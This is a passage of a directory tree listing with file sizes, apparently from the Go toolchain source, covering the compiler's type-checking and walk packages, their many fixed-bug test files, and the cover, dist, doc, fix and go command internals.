│ │ │ │ │ │ │ ├── [1.1K] interface.go
│ │ │ │ │ │ │ ├── [ 355] issue20789.go
│ │ │ │ │ │ │ ├── [ 406] issue23385.go
│ │ │ │ │ │ │ ├── [ 634] issue23434.go
│ │ │ │ │ │ │ ├── [ 522] issue31092.go
│ │ │ │ │ │ │ ├── [1.1K] issue43527.go
│ │ │ │ │ │ │ ├── [ 452] issue43674.go
│ │ │ │ │ │ │ ├── [ 308] issue46558.go
│ │ │ │ │ │ │ ├── [ 384] issue47704.go
│ │ │ │ │ │ │ ├── [ 654] issue48382.go
│ │ │ │ │ │ │ ├── [ 932] issue49205.go
│ │ │ │ │ │ │ ├── [ 965] issue49482.go
│ │ │ │ │ │ │ ├── [ 400] issue52391.go
│ │ │ │ │ │ │ ├── [2.1K] linalg.go
│ │ │ │ │ │ │ ├── [3.4K] map2.go
│ │ │ │ │ │ │ ├── [2.8K] map.go
│ │ │ │ │ │ │ ├── [ 951] sample.go
│ │ │ │ │ │ │ ├── [1.5K] slices.go
│ │ │ │ │ │ │ ├── [1.2K] smoketest.go
│ │ │ │ │ │ │ ├── [ 662] tparams.go
│ │ │ │ │ │ │ └── [2.4K] typeset.go
│ │ │ │ │ │ ├── [2.2K] testing.go
│ │ │ │ │ │ ├── [2.6K] tokens.go
│ │ │ │ │ │ ├── [1.7K] token_string.go
│ │ │ │ │ │ └── [6.2K] walk.go
│ │ │ │ │ ├── [4.0K] test
│ │ │ │ │ │ ├── [ 205] README
│ │ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ │ ├── [6.7K] flowgraph_generator1.go
│ │ │ │ │ │ │ ├── [4.0K] gen
│ │ │ │ │ │ │ │ ├── [5.6K] arithBoundaryGen.go
│ │ │ │ │ │ │ │ ├── [8.3K] arithConstGen.go
│ │ │ │ │ │ │ │ ├── [6.5K] cmpConstGen.go
│ │ │ │ │ │ │ │ ├── [8.4K] constFoldGen.go
│ │ │ │ │ │ │ │ ├── [3.6K] copyGen.go
│ │ │ │ │ │ │ │ └── [4.1K] zeroGen.go
│ │ │ │ │ │ │ ├── [4.0K] mysort
│ │ │ │ │ │ │ │ └── [ 762] mysort.go
│ │ │ │ │ │ │ ├── [ 633] ptrsort.go
│ │ │ │ │ │ │ ├── [ 77] ptrsort.out
│ │ │ │ │ │ │ └── [4.0K] reproducible
│ │ │ │ │ │ │ ├── [ 430] issue20272.go
│ │ │ │ │ │ │ ├── [ 458] issue27013.go
│ │ │ │ │ │ │ ├── [ 282] issue30202.go
│ │ │ │ │ │ │ └── [1.4K] issue38068.go
│ │ │ │ │ │ └── [ 13] test.go
│ │ │ │ │ ├── [4.0K] typebits
│ │ │ │ │ │ └── [2.9K] typebits.go
│ │ │ │ │ ├── [4.0K] typecheck
│ │ │ │ │ │ ├── [2.0K] bexport.go
│ │ │ │ │ │ ├── [4.0K] builtin
│ │ │ │ │ │ │ └── [ 10K] runtime.go
│ │ │ │ │ │ ├── [ 15K] builtin.go
│ │ │ │ │ │ ├── [ 20K] const.go
│ │ │ │ │ │ ├── [ 12K] crawler.go
│ │ │ │ │ │ ├── [8.8K] dcl.go
│ │ │ │ │ │ ├── [2.2K] export.go
│ │ │ │ │ │ ├── [ 22K] expr.go
│ │ │ │ │ │ ├── [ 24K] func.go
│ │ │ │ │ │ ├── [ 55K] iexport.go
│ │ │ │ │ │ ├── [ 48K] iimport.go
│ │ │ │ │ │ ├── [6.0K] mkbuiltin.go
│ │ │ │ │ │ ├── [ 16K] stmt.go
│ │ │ │ │ │ ├── [ 44K] subr.go
│ │ │ │ │ │ ├── [2.9K] syms.go
│ │ │ │ │ │ ├── [ 312] target.go
│ │ │ │ │ │ ├── [ 45K] typecheck.go
│ │ │ │ │ │ ├── [1.5K] type.go
│ │ │ │ │ │ └── [5.2K] universe.go
│ │ │ │ │ ├── [4.0K] types
│ │ │ │ │ │ ├── [3.3K] alg.go
│ │ │ │ │ │ ├── [1.1K] algkind_string.go
│ │ │ │ │ │ ├── [ 19K] fmt.go
│ │ │ │ │ │ ├── [2.3K] goversion.go
│ │ │ │ │ │ ├── [4.6K] identity.go
│ │ │ │ │ │ ├── [1.6K] kind_string.go
│ │ │ │ │ │ ├── [3.5K] pkg.go
│ │ │ │ │ │ ├── [2.1K] scope.go
│ │ │ │ │ │ ├── [ 13K] size.go
│ │ │ │ │ │ ├── [ 765] sort.go
│ │ │ │ │ │ ├── [4.7K] structuraltype.go
│ │ │ │ │ │ ├── [4.7K] sym.go
│ │ │ │ │ │ ├── [ 54K] type.go
│ │ │ │ │ │ ├── [4.1K] universe.go
│ │ │ │ │ │ └── [ 339] utils.go
│ │ │ │ │ ├── [4.0K] types2
│ │ │ │ │ │ ├── [ 17K] api.go
│ │ │ │ │ │ ├── [ 803] array.go
│ │ │ │ │ │ ├── [ 14K] assignments.go
│ │ │ │ │ │ ├── [1.5K] basic.go
│ │ │ │ │ │ ├── [ 23K] builtins.go
│ │ │ │ │ │ ├── [ 19K] call.go
│ │ │ │ │ │ ├── [ 910] chan.go
│ │ │ │ │ │ ├── [ 17K] check.go
│ │ │ │ │ │ ├── [1.0K] compilersupport.go
│ │ │ │ │ │ ├── [4.3K] context.go
│ │ │ │ │ │ ├── [8.3K] conversions.go
│ │ │ │ │ │ ├── [ 27K] decl.go
│ │ │ │ │ │ ├── [7.3K] errors.go
│ │ │ │ │ │ ├── [ 53K] expr.go
│ │ │ │ │ │ ├── [1017] gccgosizes.go
│ │ │ │ │ │ ├── [ 11K] index.go
│ │ │ │ │ │ ├── [ 25K] infer.go
│ │ │ │ │ │ ├── [9.5K] initorder.go
│ │ │ │ │ │ ├── [8.8K] instantiate.go
│ │ │ │ │ │ ├── [6.0K] interface.go
│ │ │ │ │ │ ├── [7.0K] labels.go
│ │ │ │ │ │ ├── [ 17K] lookup.go
│ │ │ │ │ │ ├── [ 659] map.go
│ │ │ │ │ │ ├── [2.3K] methodlist.go
│ │ │ │ │ │ ├── [9.0K] mono.go
│ │ │ │ │ │ ├── [ 14K] named.go
│ │ │ │ │ │ ├── [ 18K] object.go
│ │ │ │ │ │ ├── [ 928] objset.go
│ │ │ │ │ │ ├── [ 11K] operand.go
│ │ │ │ │ │ ├── [2.7K] package.go
│ │ │ │ │ │ ├── [ 635] pointer.go
│ │ │ │ │ │ ├── [ 14K] predicates.go
│ │ │ │ │ │ ├── [ 25K] resolver.go
│ │ │ │ │ │ ├── [4.3K] return.go
│ │ │ │ │ │ ├── [9.4K] scope.go
│ │ │ │ │ │ ├── [4.0K] selection.go
│ │ │ │ │ │ ├── [ 12K] signature.go
│ │ │ │ │ │ ├── [6.9K] sizes.go
│ │ │ │ │ │ ├── [ 577] slice.go
│ │ │ │ │ │ ├── [ 26K] stmt.go
│ │ │ │ │ │ ├── [6.2K] struct.go
│ │ │ │ │ │ ├── [ 11K] subst.go
│ │ │ │ │ │ ├── [3.7K] termlist.go
│ │ │ │ │ │ ├── [4.0K] testdata
│ │ │ │ │ │ │ ├── [4.0K] check
│ │ │ │ │ │ │ │ ├── [ 203] blank.go
│ │ │ │ │ │ │ │ ├── [ 24K] builtins0.go
│ │ │ │ │ │ │ │ ├── [5.5K] builtins1.go
│ │ │ │ │ │ │ │ ├── [1.7K] chans.go
│ │ │ │ │ │ │ │ ├── [ 442] compliterals.go
│ │ │ │ │ │ │ │ ├── [9.2K] const0.go
│ │ │ │ │ │ │ │ ├── [8.6K] const1.go
│ │ │ │ │ │ │ │ ├── [3.3K] constdecl.go
│ │ │ │ │ │ │ │ ├── [1.7K] conversions0.go
│ │ │ │ │ │ │ │ ├── [5.1K] conversions1.go
│ │ │ │ │ │ │ │ ├── [2.8K] cycles0.go
│ │ │ │ │ │ │ │ ├── [ 781] cycles1.go
│ │ │ │ │ │ │ │ ├── [1.1K] cycles2.go
│ │ │ │ │ │ │ │ ├── [ 675] cycles3.go
│ │ │ │ │ │ │ │ ├── [2.0K] cycles4.go
│ │ │ │ │ │ │ │ ├── [3.0K] cycles5.go
│ │ │ │ │ │ │ │ ├── [4.0K] decls0.go
│ │ │ │ │ │ │ │ ├── [3.6K] decls1.go
│ │ │ │ │ │ │ │ ├── [4.0K] decls2
│ │ │ │ │ │ │ │ │ ├── [3.2K] decls2a.go
│ │ │ │ │ │ │ │ │ └── [1.9K] decls2b.go
│ │ │ │ │ │ │ │ ├── [4.2K] decls3.go
│ │ │ │ │ │ │ │ ├── [3.1K] decls4.go
│ │ │ │ │ │ │ │ ├── [ 363] decls5.go
│ │ │ │ │ │ │ │ ├── [2.2K] errors.go
│ │ │ │ │ │ │ │ ├── [3.4K] expr0.go
│ │ │ │ │ │ │ │ ├── [2.6K] expr1.go
│ │ │ │ │ │ │ │ ├── [4.9K] expr2.go
│ │ │ │ │ │ │ │ ├── [ 15K] expr3.go
│ │ │ │ │ │ │ │ ├── [2.1K] funcinference.go
│ │ │ │ │ │ │ │ ├── [1.1K] go1_12.go
│ │ │ │ │ │ │ │ ├── [ 402] go1_13.go
│ │ │ │ │ │ │ │ ├── [ 343] go1_16.go
│ │ │ │ │ │ │ │ ├── [ 333] go1_8.go
│ │ │ │ │ │ │ │ ├── [5.8K] gotos.go
│ │ │ │ │ │ │ │ ├── [1.2K] importC.go
│ │ │ │ │ │ │ │ ├── [4.0K] importdecl0
│ │ │ │ │ │ │ │ │ ├── [1.2K] importdecl0a.go
│ │ │ │ │ │ │ │ │ └── [ 733] importdecl0b.go
│ │ │ │ │ │ │ │ ├── [4.0K] importdecl1
│ │ │ │ │ │ │ │ │ ├── [ 521] importdecl1a.go
│ │ │ │ │ │ │ │ │ └── [ 267] importdecl1b.go
│ │ │ │ │ │ │ │ ├── [1.9K] init0.go
│ │ │ │ │ │ │ │ ├── [1.5K] init1.go
│ │ │ │ │ │ │ │ ├── [3.5K] init2.go
│ │ │ │ │ │ │ │ ├── [4.0K] issue25008
│ │ │ │ │ │ │ │ │ ├── [ 260] issue25008a.go
│ │ │ │ │ │ │ │ │ └── [ 198] issue25008b.go
│ │ │ │ │ │ │ │ ├── [ 11K] issues0.go
│ │ │ │ │ │ │ │ ├── [6.0K] issues1.go
│ │ │ │ │ │ │ │ ├── [3.2K] labels.go
│ │ │ │ │ │ │ │ ├── [2.2K] linalg.go
│ │ │ │ │ │ │ │ ├── [2.4K] literals.go
│ │ │ │ │ │ │ │ ├── [ 361] main0.go
│ │ │ │ │ │ │ │ ├── [ 250] main1.go
│ │ │ │ │ │ │ │ ├── [2.8K] map0.go
│ │ │ │ │ │ │ │ ├── [3.4K] map1.go
│ │ │ │ │ │ │ │ ├── [3.4K] methodsets.go
│ │ │ │ │ │ │ │ ├── [ 13K] shifts.go
│ │ │ │ │ │ │ │ ├── [1.5K] slices.go
│ │ │ │ │ │ │ │ ├── [ 19K] stmt0.go
│ │ │ │ │ │ │ │ ├── [3.3K] stmt1.go
│ │ │ │ │ │ │ │ ├── [1.4K] typeinference.go
│ │ │ │ │ │ │ │ ├── [1.6K] typeinst0.go
│ │ │ │ │ │ │ │ ├── [5.6K] typeinst1.go
│ │ │ │ │ │ │ │ ├── [ 384] typeinstcycles.go
│ │ │ │ │ │ │ │ ├── [ 15K] typeparams.go
│ │ │ │ │ │ │ │ ├── [2.2K] unions.go
│ │ │ │ │ │ │ │ └── [5.5K] vardecl.go
│ │ │ │ │ │ │ ├── [4.0K] examples
│ │ │ │ │ │ │ │ ├── [2.9K] constraints.go
│ │ │ │ │ │ │ │ ├── [5.4K] functions.go
│ │ │ │ │ │ │ │ ├── [3.1K] inference.go
│ │ │ │ │ │ │ │ ├── [5.0K] methods.go
│ │ │ │ │ │ │ │ ├── [ 576] operations.go
│ │ │ │ │ │ │ │ ├── [1.4K] typesets.go
│ │ │ │ │ │ │ │ └── [8.3K] types.go
│ │ │ │ │ │ │ ├── [4.0K] fixedbugs
│ │ │ │ │ │ │ │ ├── [ 410] issue20583.go
│ │ │ │ │ │ │ │ ├── [ 306] issue23203a.go
│ │ │ │ │ │ │ │ ├── [ 306] issue23203b.go
│ │ │ │ │ │ │ │ ├── [ 301] issue25838.go
│ │ │ │ │ │ │ │ ├── [ 241] issue26390.go
│ │ │ │ │ │ │ │ ├── [1.2K] issue28251.go
│ │ │ │ │ │ │ │ ├── [3.1K] issue39634.go
│ │ │ │ │ │ │ │ ├── [ 296] issue39664.go
│ │ │ │ │ │ │ │ ├── [ 533] issue39680.go
│ │ │ │ │ │ │ │ ├── [ 424] issue39693.go
│ │ │ │ │ │ │ │ ├── [ 500] issue39699.go
│ │ │ │ │ │ │ │ ├── [ 496] issue39711.go
│ │ │ │ │ │ │ │ ├── [ 350] issue39723.go
│ │ │ │ │ │ │ │ ├── [ 523] issue39725.go
│ │ │ │ │ │ │ │ ├── [ 579] issue39754.go
│ │ │ │ │ │ │ │ ├── [ 507] issue39755.go
│ │ │ │ │ │ │ │ ├── [ 572] issue39768.go
│ │ │ │ │ │ │ │ ├── [ 915] issue39938.go
│ │ │ │ │ │ │ │ ├── [ 242] issue39948.go
│ │ │ │ │ │ │ │ ├── [ 430] issue39976.go
│ │ │ │ │ │ │ │ ├── [ 539] issue39982.go
│ │ │ │ │ │ │ │ ├── [ 270] issue40038.go
│ │ │ │ │ │ │ │ ├── [ 336] issue40056.go
│ │ │ │ │ │ │ │ ├── [ 328] issue40057.go
│ │ │ │ │ │ │ │ ├── [ 256] issue40301.go
│ │ │ │ │ │ │ │ ├── [ 372] issue40684.go
│ │ │ │ │ │ │ │ ├── [ 614] issue40789.go
│ │ │ │ │ │ │ │ ├── [2.0K] issue41124.go
│ │ │ │ │ │ │ │ ├── [ 533] issue42695.go
│ │ │ │ │ │ │ │ ├── [ 645] issue42758.go
│ │ │ │ │ │ │ │ ├── [ 294] issue42987.go
│ │ │ │ │ │ │ │ ├── [ 524] issue43056.go
│ │ │ │ │ │ │ │ ├── [ 715] issue43087.go
│ │ │ │ │ │ │ │ ├── [ 324] issue43109.go
│ │ │ │ │ │ │ │ ├── [ 785] issue43110.go
│ │ │ │ │ │ │ │ ├── [ 385] issue43124.go
│ │ │ │ │ │ │ │ ├── [ 253] issue43125.go
│ │ │ │ │ │ │ │ ├── [ 456] issue43190.go
│ │ │ │ │ │ │ │ ├── [ 371] issue43527.go
│ │ │ │ │ │ │ │ ├── [1.1K] issue43671.go
│ │ │ │ │ │ │ │ ├── [1.0K] issue44688.go
│ │ │ │ │ │ │ │ ├── [ 530] issue44799.go
│ │ │ │ │ │ │ │ ├── [ 254] issue45114.go
│ │ │ │ │ │ │ │ ├── [ 302] issue45548.go
│ │ │ │ │ │ │ │ ├── [ 303] issue45550.go
│ │ │ │ │ │ │ │ ├── [ 600] issue45635.go
│ │ │ │ │ │ │ │ ├── [ 619] issue45639.go
│ │ │ │ │ │ │ │ ├── [ 590] issue45920.go
│ │ │ │ │ │ │ │ ├── [ 315] issue45985.go
│ │ │ │ │ │ │ │ ├── [ 293] issue46090.go
│ │ │ │ │ │ │ │ ├── [ 450] issue46275.go
│ │ │ │ │ │ │ │ ├── [ 510] issue46461.go
│ │ │ │ │ │ │ │ ├── [ 576] issue46583.go
│ │ │ │ │ │ │ │ ├── [ 337] issue47031.go
│ │ │ │ │ │ │ │ ├── [ 830] issue47115.go
│ │ │ │ │ │ │ │ ├── [1.9K] issue47127.go
│ │ │ │ │ │ │ │ ├── [ 988] issue47411.go
│ │ │ │ │ │ │ │ ├── [1.7K] issue47747.go
│ │ │ │ │ │ │ │ ├── [1.1K] issue47796.go
│ │ │ │ │ │ │ │ ├── [2.5K] issue47818.go
│ │ │ │ │ │ │ │ ├── [ 554] issue47887.go
│ │ │ │ │ │ │ │ ├── [ 664] issue47968.go
│ │ │ │ │ │ │ │ ├── [ 312] issue47996.go
│ │ │ │ │ │ │ │ ├── [1.4K] issue48008.go
│ │ │ │ │ │ │ │ ├── [ 394] issue48018.go
│ │ │ │ │ │ │ │ ├── [ 356] issue48048.go
│ │ │ │ │ │ │ │ ├── [ 260] issue48082.go
│ │ │ │ │ │ │ │ ├── [ 258] issue48083.go
│ │ │ │ │ │ │ │ ├── [ 912] issue48136.go
│ │ │ │ │ │ │ │ ├── [ 239] issue48234.go
│ │ │ │ │ │ │ │ ├── [ 475] issue48312.go
│ │ │ │ │ │ │ │ ├── [ 436] issue48472.go
│ │ │ │ │ │ │ │ ├── [ 283] issue48529.go
│ │ │ │ │ │ │ │ ├── [ 486] issue48582.go
│ │ │ │ │ │ │ │ ├── [ 571] issue48619.go
│ │ │ │ │ │ │ │ ├── [ 287] issue48656.go
│ │ │ │ │ │ │ │ ├── [ 264] issue48695.go
│ │ │ │ │ │ │ │ ├── [ 767] issue48703.go
│ │ │ │ │ │ │ │ ├── [1.1K] issue48712.go
│ │ │ │ │ │ │ │ ├── [ 340] issue48819.go
│ │ │ │ │ │ │ │ ├── [ 754] issue48951.go
│ │ │ │ │ │ │ │ ├── [ 258] issue48962.go
│ │ │ │ │ │ │ │ ├── [ 455] issue48974.go
│ │ │ │ │ │ │ │ ├── [ 238] issue49003.go
│ │ │ │ │ │ │ │ ├── [ 710] issue49005.go
│ │ │ │ │ │ │ │ ├── [ 517] issue49043.go
│ │ │ │ │ │ │ │ ├── [ 366] issue49112.go
│ │ │ │ │ │ │ │ ├── [1009] issue49179.go
│ │ │ │ │ │ │ │ ├── [ 752] issue49242.go
│ │ │ │ │ │ │ │ ├── [ 550] issue49247.go
│ │ │ │ │ │ │ │ ├── [ 975] issue49276.go
│ │ │ │ │ │ │ │ ├── [ 535] issue49296.go
│ │ │ │ │ │ │ │ ├── [ 695] issue49439.go
│ │ │ │ │ │ │ │ ├── [1.0K] issue49482.go
│ │ │ │ │ │ │ │ ├── [ 811] issue49541.go
│ │ │ │ │ │ │ │ ├── [ 442] issue49579.go
│ │ │ │ │ │ │ │ ├── [ 235] issue49592.go
│ │ │ │ │ │ │ │ ├── [ 484] issue49602.go
│ │ │ │ │ │ │ │ ├── [ 347] issue49705.go
│ │ │ │ │ │ │ │ ├── [ 439] issue49735.go
│ │ │ │ │ │ │ │ ├── [ 579] issue49739.go
│ │ │ │ │ │ │ │ ├── [ 240] issue49864.go
│ │ │ │ │ │ │ │ ├── [ 347] issue50259.go
│ │ │ │ │ │ │ │ ├── [ 880] issue50276.go
│ │ │ │ │ │ │ │ ├── [ 554] issue50281.go
│ │ │ │ │ │ │ │ ├── [ 248] issue50321.go
│ │ │ │ │ │ │ │ ├── [ 949] issue50372.go
│ │ │ │ │ │ │ │ ├── [1.4K] issue50417.go
│ │ │ │ │ │ │ │ ├── [1.1K] issue50426.go
│ │ │ │ │ │ │ │ ├── [ 219] issue50450.go
│ │ │ │ │ │ │ │ ├── [ 360] issue50516.go
│ │ │ │ │ │ │ │ ├── [ 732] issue50646.go
│ │ │ │ │ │ │ │ ├── [1.0K] issue50755.go
│ │ │ │ │ │ │ │ ├── [ 392] issue50779.go
│ │ │ │ │ │ │ │ ├── [1.7K] issue50782.go
│ │ │ │ │ │ │ │ ├── [ 621] issue50816.go
│ │ │ │ │ │ │ │ ├── [ 369] issue50833.go
│ │ │ │ │ │ │ │ ├── [ 493] issue50912.go
│ │ │ │ │ │ │ │ ├── [ 453] issue50918.go
│ │ │ │ │ │ │ │ ├── [1.4K] issue50929.go
│ │ │ │ │ │ │ │ ├── [ 431] issue50965.go
│ │ │ │ │ │ │ │ ├── [ 221] issue51048.go
│ │ │ │ │ │ │ │ ├── [ 439] issue51145.go
│ │ │ │ │ │ │ │ ├── [ 463] issue51158.go
│ │ │ │ │ │ │ │ ├── [4.8K] issue51229.go
│ │ │ │ │ │ │ │ ├── [ 780] issue51232.go
│ │ │ │ │ │ │ │ ├── [ 657] issue51233.go
│ │ │ │ │ │ │ │ ├── [ 903] issue51257.go
│ │ │ │ │ │ │ │ ├── [ 414] issue51335.go
│ │ │ │ │ │ │ │ ├── [ 720] issue51339.go
│ │ │ │ │ │ │ │ ├── [ 415] issue51360.go
│ │ │ │ │ │ │ │ ├── [ 658] issue51376.go
│ │ │ │ │ │ │ │ ├── [ 318] issue51386.go
│ │ │ │ │ │ │ │ ├── [ 373] issue51437.go
│ │ │ │ │ │ │ │ ├── [1.4K] issue51472.go
│ │ │ │ │ │ │ │ ├── [ 208] issue51509.go
│ │ │ │ │ │ │ │ ├── [ 390] issue51533.go
│ │ │ │ │ │ │ │ ├── [ 425] issue51578.go
│ │ │ │ │ │ │ │ ├── [ 327] issue51593.go
│ │ │ │ │ │ │ │ ├── [2.0K] issue51607.go
│ │ │ │ │ │ │ │ ├── [ 497] issue51616.go
│ │ │ │ │ │ │ │ ├── [ 775] issue51658.go
│ │ │ │ │ │ │ │ ├── [ 524] issue51877.go
│ │ │ │ │ │ │ │ ├── [ 732] issue52031.go
│ │ │ │ │ │ │ │ ├── [ 273] issue52401.go
│ │ │ │ │ │ │ │ └── [2.3K] issue6977.go
│ │ │ │ │ │ │ ├── [ 285] manual.go
│ │ │ │ │ │ │ └── [4.0K] spec
│ │ │ │ │ │ │ ├── [5.0K] assignability.go
│ │ │ │ │ │ │ ├── [3.0K] comparisons.go
│ │ │ │ │ │ │ └── [7.2K] conversions.go
│ │ │ │ │ │ ├── [ 929] tuple.go
│ │ │ │ │ │ ├── [2.9K] type.go
│ │ │ │ │ │ ├── [1.8K] typelists.go
│ │ │ │ │ │ ├── [4.8K] typeparam.go
│ │ │ │ │ │ ├── [ 14K] typeset.go
│ │ │ │ │ │ ├── [ 11K] typestring.go
│ │ │ │ │ │ ├── [3.5K] typeterm.go
│ │ │ │ │ │ ├── [ 16K] typexpr.go
│ │ │ │ │ │ ├── [ 18K] unify.go
│ │ │ │ │ │ ├── [6.1K] union.go
│ │ │ │ │ │ ├── [7.6K] universe.go
│ │ │ │ │ │ ├── [4.5K] validtype.go
│ │ │ │ │ │ └── [2.1K] version.go
│ │ │ │ │ ├── [4.0K] walk
│ │ │ │ │ │ ├── [ 20K] assign.go
│ │ │ │ │ │ ├── [ 23K] builtin.go
│ │ │ │ │ │ ├── [7.7K] closure.go
│ │ │ │ │ │ ├── [ 15K] compare.go
│ │ │ │ │ │ ├── [ 18K] complit.go
│ │ │ │ │ │ ├── [ 17K] convert.go
│ │ │ │ │ │ ├── [ 25K] expr.go
│ │ │ │ │ │ ├── [ 42K] order.go
│ │ │ │ │ │ ├── [ 856] race.go
│ │ │ │ │ │ ├── [ 13K] range.go
│ │ │ │ │ │ ├── [7.6K] select.go
│ │ │ │ │ │ ├── [4.7K] stmt.go
│ │ │ │ │ │ ├── [ 19K] switch.go
│ │ │ │ │ │ ├── [1.5K] temp.go
│ │ │ │ │ │ └── [ 11K] walk.go
│ │ │ │ │ ├── [4.0K] wasm
│ │ │ │ │ │ └── [ 13K] ssa.go
│ │ │ │ │ └── [4.0K] x86
│ │ │ │ │ ├── [ 887] galign.go
│ │ │ │ │ ├── [1.5K] ggen.go
│ │ │ │ │ └── [ 26K] ssa.go
│ │ │ │ ├── [1.3K] main.go
│ │ │ │ └── [5.5K] README.md
│ │ │ ├── [4.0K] cover
│ │ │ │ ├── [ 20K] cover.go
│ │ │ │ ├── [1.0K] doc.go
│ │ │ │ ├── [6.3K] func.go
│ │ │ │ ├── [6.8K] html.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [ 502] directives.go
│ │ │ │ ├── [4.0K] html
│ │ │ │ │ ├── [ 483] html.go
│ │ │ │ │ └── [ 345] html.golden
│ │ │ │ ├── [3.0K] main.go
│ │ │ │ ├── [ 450] p.go
│ │ │ │ ├── [ 134] profile.cov
│ │ │ │ ├── [4.9K] test.go
│ │ │ │ └── [1.0K] toolexec.go
│ │ │ ├── [4.0K] dist
│ │ │ │ ├── [ 48K] build.go
│ │ │ │ ├── [3.4K] buildgo.go
│ │ │ │ ├── [3.2K] buildruntime.go
│ │ │ │ ├── [3.0K] buildtag.go
│ │ │ │ ├── [9.8K] buildtool.go
│ │ │ │ ├── [ 645] doc.go
│ │ │ │ ├── [1.1K] exec.go
│ │ │ │ ├── [6.3K] imports.go
│ │ │ │ ├── [5.1K] main.go
│ │ │ │ ├── [1.3K] README
│ │ │ │ ├── [ 233] sys_default.go
│ │ │ │ ├── [1.5K] sys_windows.go
│ │ │ │ ├── [ 49K] test.go
│ │ │ │ ├── [ 628] test_linux.go
│ │ │ │ ├── [ 268] util_gccgo.go
│ │ │ │ ├── [ 622] util_gc.go
│ │ │ │ ├── [ 11K] util.go
│ │ │ │ ├── [ 664] vfp_arm.s
│ │ │ │ └── [ 335] vfp_default.s
│ │ │ ├── [4.0K] doc
│ │ │ │ ├── [9.0K] dirs.go
│ │ │ │ ├── [ 12K] main.go
│ │ │ │ ├── [ 30K] pkg.go
│ │ │ │ └── [4.0K] testdata
│ │ │ │ ├── [4.0K] merge
│ │ │ │ │ ├── [ 75] aa.go
│ │ │ │ │ └── [ 75] bb.go
│ │ │ │ ├── [4.0K] nested
│ │ │ │ │ ├── [4.0K] empty
│ │ │ │ │ │ └── [ 14] empty.go
│ │ │ │ │ ├── [ 70] ignore.go
│ │ │ │ │ └── [4.0K] nested
│ │ │ │ │ └── [ 36] real.go
│ │ │ │ └── [5.3K] pkg.go
│ │ │ ├── [4.0K] fix
│ │ │ │ ├── [1.2K] buildtag.go
│ │ │ │ ├── [3.5K] cftype.go
│ │ │ │ ├── [ 510] context.go
│ │ │ │ ├── [1.4K] doc.go
│ │ │ │ ├── [1.1K] egltype.go
│ │ │ │ ├── [ 15K] fix.go
│ │ │ │ ├── [1.7K] gotypes.go
│ │ │ │ ├── [1.2K] jnitype.go
│ │ │ │ ├── [5.8K] main.go
│ │ │ │ ├── [1.3K] netipv6zone.go
│ │ │ │ ├── [1.1K] printerconfig.go
│ │ │ │ └── [ 20K] typecheck.go
│ │ │ ├── [4.0K] go
│ │ │ │ ├── [133K] alldocs.go
│ │ │ │ ├── [ 300] go11.go
│ │ │ │ ├── [4.0K] internal
│ │ │ │ │ ├── [4.0K] auth
│ │ │ │ │ │ ├── [ 729] auth.go
│ │ │ │ │ │ └── [2.3K] netrc.go
│ │ │ │ │ ├── [4.0K] base
│ │ │ │ │ │ ├── [4.2K] base.go
│ │ │ │ │ │ ├── [ 682] env.go
│ │ │ │ │ │ ├── [1.7K] flag.go
│ │ │ │ │ │ ├── [4.3K] goflags.go
│ │ │ │ │ │ ├── [1.3K] path.go
│ │ │ │ │ │ ├── [ 663] signal.go
│ │ │ │ │ │ ├── [ 419] signal_notunix.go
│ │ │ │ │ │ ├── [ 423] signal_unix.go
│ │ │ │ │ │ └── [1016] tool.go
│ │ │ │ │ ├── [4.0K] bug
│ │ │ │ │ │ └── [5.6K] bug.go
│ │ │ │ │ ├── [4.0K] cache
│ │ │ │ │ │ ├── [ 17K] cache.go
│ │ │ │ │ │ ├── [2.7K] default.go
│ │ │ │ │ │ └── [4.9K] hash.go
│ │ │ │ │ ├── [4.0K] cfg
│ │ │ │ │ │ └── [ 13K] cfg.go
│ │ │ │ │ ├── [4.0K] clean
│ │ │ │ │ │ └── [ 11K] clean.go
│ │ │ │ │ ├── [4.0K] cmdflag
│ │ │ │ │ │ └── [3.7K] flag.go
│ │ │ │ │ ├── [4.0K] doc
│ │ │ │ │ │ └── [4.9K] doc.go
│ │ │ │ │ ├── [4.0K] envcmd
│ │ │ │ │ │ └── [ 15K] env.go
│ │ │ │ │ ├── [4.0K] fix
│ │ │ │ │ │ └── [2.2K] fix.go
│ │ │ │ │ ├── [4.0K] fmtcmd
│ │ │ │ │ │ └── [3.0K] fmt.go
│ │ │ │ │ ├── [4.0K] fsys
│ │ │ │ │ │ └── [ 20K] fsys.go
│ │ │ │ │ ├── [4.0K] generate
│ │ │ │ │ │ └── [ 13K] generate.go
│ │ │ │ │ ├── [4.0K] get
│ │ │ │ │ │ └── [ 21K] get.go
│ │ │ │ │ ├── [4.0K] help
│ │ │ │ │ │ ├── [ 33K] helpdoc.go
│ │ │ │ │ │ └── [4.7K] help.go
│ │ │ │ │ ├── [4.0K] imports
│ │ │ │ │ │ ├── [9.6K] build.go
│ │ │ │ │ │ ├── [6.1K] read.go
│ │ │ │ │ │ ├── [2.6K] scan.go
│ │ │ │ │ │ ├── [1.3K] tags.go
│ │ │ │ │ │ └── [4.0K] testdata
│ │ │ │ │ │ ├── [4.0K] android
│ │ │ │ │ │ │ ├── [ 30] a_android.go
│ │ │ │ │ │ │ ├── [ 30] b_android_arm64.go
│ │ │ │ │ │ │ ├── [ 30] c_linux.go
│ │ │ │ │ │ │ ├── [ 30] d_linux_arm64.go
│ │ │ │ │ │ │ ├── [ 68] e.go
│ │ │ │ │ │ │ ├── [ 64] f.go
│ │ │ │ │ │ │ ├── [ 70] g.go
│ │ │ │ │ │ │ ├── [ 13] tags.txt
│ │ │ │ │ │ │ └── [ 12] want.txt
│ │ │ │ │ │ ├── [4.0K] illumos
│ │ │ │ │ │ │ ├── [ 30] a_illumos.go
│ │ │ │ │ │ │ ├── [ 30] b_illumos_amd64.go
│ │ │ │ │ │ │ ├── [ 30] c_solaris.go
│ │ │ │ │ │ │ ├── [ 30] d_solaris_amd64.go
│ │ │ │ │ │ │ ├── [ 68] e.go
│ │ │ │ │ │ │ ├── [ 68] f.go
│ │ │ │ │ │ │ ├── [ 70] g.go
│ │ │ │ │ │ │ ├── [ 14] tags.txt
│ │ │ │ │ │ │ └── [ 12] want.txt
│ │ │ │ │ │ └── [4.0K] star
│ │ │ │ │ │ ├── [ 1] tags.txt
│ │ │ │ │ │ ├── [ 32] want.txt
│ │ │ │ │ │ ├── [ 134] x1.go
│ │ │ │ │ │ ├── [ 31] x_darwin.go
│ │ │ │ │ │ ├── [ 28] x.go
│ │ │ │ │ │ └── [ 28] x_windows.go
│ │ │ │ │ ├── [4.0K] list
